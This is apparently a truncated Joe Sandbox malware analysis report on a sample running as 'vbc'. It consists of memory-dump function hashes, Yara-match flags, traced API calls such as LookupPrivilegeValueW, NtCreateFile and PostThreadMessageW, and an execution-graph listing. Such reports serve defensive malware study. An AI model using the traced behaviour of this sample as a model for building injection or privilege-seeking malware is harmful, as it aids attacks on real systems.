                                            • Instruction Fuzzy Hash: 28F0E5B82042952BD710DF71D844ED33FA9DF41360F14459EF8991B143C034A45ACBB1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A08D
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                            • Instruction ID: 52797000195eaed384c72aa9dcce9225c0ea881c405841437723114bb70c3a82
                                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                            • Instruction Fuzzy Hash: AEE012B1210208ABDB18EF99CC49EA777ACAF88760F018559BA185B242C630E9108AB0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                            • Instruction ID: 2f72ad50c13f3bcf2c9af244d49b542148f264c451808f1d297bb805e18cb808
                                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                            • Instruction Fuzzy Hash: CDE01AB12002086BDB10DF49CC85EE737ADAF88650F018555BA0C57241C934E8508BF5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A0C8
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID:
                                            • API String ID: 621844428-0
                                            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                            • Instruction ID: 12fe1e20a4fde289fa2c932464272cdbd0b6c77391ac3b13e7111125b87f0676
                                            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                            • Instruction Fuzzy Hash: 14D012716102147BD620DB99CC85FD7779CDF48760F018465BA5C5B241C531BA1086E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A0C8
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID:
                                            • API String ID: 621844428-0
                                            • Opcode ID: 1fc7d20f58702dfe1a6385b027fd4cb1ef8faf4408b6f8ab23ddb250741d824d
                                            • Instruction ID: 6ec1928867d70db06631118dd6a6670a4e80df2ae2211c676bcc51d2afbf419b
                                            • Opcode Fuzzy Hash: 1fc7d20f58702dfe1a6385b027fd4cb1ef8faf4408b6f8ab23ddb250741d824d
                                            • Instruction Fuzzy Hash: 27E08C753022046BD620EF54CDC9EC777689F09360F128899BA586F241D234EA00C7A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                            • Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_a20000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                            • Instruction ID: 802df7f3fcaafa8157d67aff97ad1a6b93b4f3b5b251eee5c2f3a53fe4d7c84f
                                            • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                            • Instruction Fuzzy Hash: E1F0C2317241599BDB48EB189D91B6A33E5FB9A302F64C039ED49CB241E631ED448390
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f1669e11ad3f2db42f4edb2d1b6af7db5eb305ab2e62030786c1ba521431501a
                                            • Instruction ID: 55eabb77780294906751bcd01b9747c7c601a56198358abbad2850f632ef602e
                                            • Opcode Fuzzy Hash: f1669e11ad3f2db42f4edb2d1b6af7db5eb305ab2e62030786c1ba521431501a
                                            • Instruction Fuzzy Hash: F6D01233B5817509D9369D6CE8946B4FBB5DB83624F0013ABDC84B72918957B05241C9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: be7af3753b33950736067c3ba3dab4c3a1ac96de5145e04d7940ba504d0c7c6f
                                            • Instruction ID: 9801893d2f5d77c543fc2294b50c0aebf5bb5c1a5ce7f1126ec7bee5f6fadfab
                                            • Opcode Fuzzy Hash: be7af3753b33950736067c3ba3dab4c3a1ac96de5145e04d7940ba504d0c7c6f
                                            • Instruction Fuzzy Hash: A0D0C775B091018AC301AF5954415B1FB75E747161704229AF959D7651D321845287E9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                            • Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_a20000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                            • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                                            • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                            • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                            • Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_a20000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                            • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                            • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                            • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                            • Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_a20000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                            • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                            • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                            • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                            • Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_a20000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                            • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                            • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                            • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                            • Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_a20000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                            • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                            • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                            • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                            • Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_a20000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                            • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                            • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                            • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                            • Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_a20000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                            • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                            • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                            • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Strings
                                            • WindowsExcludedProcs, xrefs: 00A687C1
                                            • Kernel-MUI-Language-SKU, xrefs: 00A689FC
                                            • Kernel-MUI-Language-Allowed, xrefs: 00A68827
                                            • Kernel-MUI-Language-Disallowed, xrefs: 00A68914
                                            • Kernel-MUI-Number-Allowed, xrefs: 00A687E6
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                            • Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_a20000_vbc.jbxd
                                            Similarity
                                            • API ID: _wcspbrk
                                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                            • API String ID: 402402107-258546922
                                            • Opcode ID: 208b22777f0f102398881cc315b81a742f43ec2479715bf5b2b875e574178b3b
                                            • Instruction ID: 5ab7665fc7cde54beed12ebbd0d115cb4ab6791bda4bcc5c262023b1d487ed70
                                            • Opcode Fuzzy Hash: 208b22777f0f102398881cc315b81a742f43ec2479715bf5b2b875e574178b3b
                                            • Instruction Fuzzy Hash: 11F1F5B6D00209EFCF11DFA4CA859EEBBB8FF08300F14456AE505A7211EB359E45DB60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                            • Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_a20000_vbc.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: 7c777b6726091f49dd0a9d011c1821f310e2863bf4d13446bf67e184df0fd0cd
                                            • Instruction ID: 9bb5ff0cbf4bea62b3719ec61a768380f95b12e9dd7b2d19e37c31db67ad464c
                                            • Opcode Fuzzy Hash: 7c777b6726091f49dd0a9d011c1821f310e2863bf4d13446bf67e184df0fd0cd
                                            • Instruction Fuzzy Hash: 4A6127B5D00755AACB24EF59C8808BFBBB9EFD5300B54C52DF4DA4B581D334AA41CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AA2206
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                            • Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_a20000_vbc.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 885266447-4236105082
                                            • Opcode ID: 908223327254f09830818ec8ae3f7d4d877e2b0970df773f599098c952fda512
                                            • Instruction ID: 7662a3023d0ac1f1c6d74e8822ec220e7cd4a0393b1a915961b4bed8a8587431
                                            • Opcode Fuzzy Hash: 908223327254f09830818ec8ae3f7d4d877e2b0970df773f599098c952fda512
                                            • Instruction Fuzzy Hash: 52513935B002116FEF199B18CC81FA673A9AFD9710F218229FD55DF2C6DA31EC5587A0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • ___swprintf_l.LIBCMT ref: 00AAEA22
                                              • Part of subcall function 00A813CB: ___swprintf_l.LIBCMT ref: 00A8146B
                                              • Part of subcall function 00A813CB: ___swprintf_l.LIBCMT ref: 00A81490
                                            • ___swprintf_l.LIBCMT ref: 00A8156D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                            • Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_a20000_vbc.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: %%%u$]:%u
                                            • API String ID: 48624451-3050659472
                                            • Opcode ID: 7d3d601b5c065af6819efa8aa9111b20fa3f77d37546ed2a927dd24314fe86d1
                                            • Instruction ID: 8eebf5763d3f5fbfe0faef7f2a56e820e9104b416245083c7acf16ea107c958d
                                            • Opcode Fuzzy Hash: 7d3d601b5c065af6819efa8aa9111b20fa3f77d37546ed2a927dd24314fe86d1
                                            • Instruction Fuzzy Hash: E52191B2900219ABCB24EF58CD41AEF73BCBB90700F548555FC4AD7141DB70AA5A8BE1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AA22F4
                                            Strings
                                            • RTL: Resource at %p, xrefs: 00AA230B
                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00AA22FC
                                            • RTL: Re-Waiting, xrefs: 00AA2328
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                            • Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
                                            • Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_a20000_vbc.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 885266447-871070163
                                            • Opcode ID: 47360fa4984136556182ee5e1c49b921a4c9c39c788f914cf3dedb55397d740a
                                            • Instruction ID: 1317fc116970ccd443843b3140a28835e8de914156106ca3ee5e25088ffbf05f
                                            • Opcode Fuzzy Hash: 47360fa4984136556182ee5e1c49b921a4c9c39c788f914cf3dedb55397d740a
                                            • Instruction Fuzzy Hash: F9513572A007026BDF15EB38CD91FA673A8EF59760F104229FD49DF281EB61EC4187A0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Execution Graph

                                            Execution Coverage:2.2%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:0%
                                            Total number of Nodes:321
                                            Total number of Limit Nodes:46

                                            Graph

                                            execution_graph 48175 272c77b 13 API calls 48211 2729879 6 API calls __cftof 48178 9912f NtClose LdrInitializeThunk LdrInitializeThunk 48255 274955c LdrInitializeThunk __cftof 48180 9d120 NtClose LdrInitializeThunk 48134 9f138 NtClose LookupPrivilegeValueW LdrInitializeThunk 48137 9813b NtCreateFile NtReadFile NtClose RtlFreeHeap LdrInitializeThunk 48153 94443 NtCreateFile NtReadFile NtClose RtlFreeHeap LdrInitializeThunk 48223 94245 NtCreateFile NtReadFile NtClose RtlFreeHeap 48225 273a421 7 API calls __cftof 48140 9f45e LdrInitializeThunk LdrInitializeThunk 48262 ab360 11 API calls 48230 272a41e 12 API calls 48132 98179 NtCreateFile NtReadFile NtClose RtlFreeHeap 48133 270f900 LdrInitializeThunk 48162 a847d RtlFreeHeap 48265 98373 7 API calls 48192 271e70f 6 API calls 48234 98286 PostThreadMessageW PostThreadMessageW 48195 272d298 12 API calls __cftof 48139 ab3bc 19 API calls 48141 aa1b1 LookupPrivilegeValueW 47763 aebcd 47766 ab3c0 47763->47766 47765 aebd2 47767 ab3e6 47766->47767 47772 99d10 47767->47772 47769 ab3f2 47770 ab416 47769->47770 47778 98f10 47769->47778 47770->47765 47800 99c60 47772->47800 47774 99d24 47774->47769 47775 99d1d 47775->47774 47807 9f140 47775->47807 47782 98f37 47778->47782 47780 98fdc 47995 9f3d0 47780->47995 47796 990d2 47782->47796 47985 9f340 47782->47985 47783 98fe6 47783->47796 48005 9ca60 47783->48005 47785 99039 47786 a4a10 4 API calls 47785->47786 47787 99046 47786->47787 47788 a4a10 4 API calls 47787->47788 47789 99057 47788->47789 47790 99085 47789->47790 47791 99064 47789->47791 47793 a4a10 4 API calls 47790->47793 48011 9d5f0 47791->48011 47798 990a1 47793->47798 47794 9906b 48015 98ce0 47794->48015 47795 98ce0 15 API calls 47795->47796 47796->47770 47798->47795 47802 99c73 47800->47802 47801 99c86 47801->47775 47802->47801 47815 aaca0 47802->47815 47804 99cc3 47804->47801 47826 99a80 47804->47826 47806 99ce3 47806->47775 47808 9f159 47807->47808 47809 99d35 47808->47809 47977 aa1c0 47808->47977 47809->47769 47811 9f192 47812 9f1bd 47811->47812 47980 a9c50 47811->47980 47814 a9e80 NtClose 47812->47814 47814->47809 47816 aacb9 47815->47816 47832 a4a10 47816->47832 47818 aacd1 47819 aacda 47818->47819 47854 aaae0 47818->47854 47819->47804 47821 aacee 47821->47819 47866 a98f0 47821->47866 47959 97e80 47826->47959 47828 99aa1 47828->47806 47829 99a9a 47829->47828 47969 98140 47829->47969 47833 a4a24 47832->47833 47834 a4b33 47832->47834 47833->47834 47873 a9d50 47833->47873 47834->47818 47836 a4b77 